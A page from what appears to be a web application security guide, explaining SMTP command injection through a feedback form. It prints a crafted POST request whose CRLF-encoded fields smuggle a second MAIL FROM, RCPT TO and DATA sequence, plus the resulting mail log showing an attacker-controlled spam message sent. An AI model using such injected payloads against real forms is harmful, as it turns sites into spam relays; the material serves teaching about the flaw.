Web application security - the fast guide 1.1 | Page 147
Chapter 7 - Attack execution (3)
P a g e | 147
The main difference with previous header manipulation approach is the fact that
you can pass SMTP commands which will give the attacker the opportunity to
send another MAIL From command getting the full control over totally new
message.
As example let’s say that the attacker injects the following input benefitting of
course from the improper input validation.
POST feedback.php HTTP/1.1
Host: vulnerableApp.com
Content-Length: 266
[email protected]&Subject=Site+feedback%0d%0a
any message%0d%0a%2e%0d
%0aMAIL+FROM:+mail@attacker-
viagra.com%0d%0aRCPT+TO:[email protected]%0d%0aDATA%0d%0a
From:+ [email protected]%0d%0aTo:+ [email protected]
.com%0d%0aSubject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a&Me
ssage=spam message contents
The resulting SMTP communication log will be
MAIL FROM: [email protected]
RCPT TO: feedback@ vulnerableApp.com
DATA
From: [email protected]
To: [email protected]
Subject: Site+feedback
any message
.
MAIL FROM: [email protected]
RCPT TO: [email protected]
DATA
From: [email protected]
To: [email protected]
Subject: Cheap V1AGR4
Blah
.
spam message contents
.
It is quite clear that two messages will be sent on is a legitimate one and the
second is totally controlled by the attacker.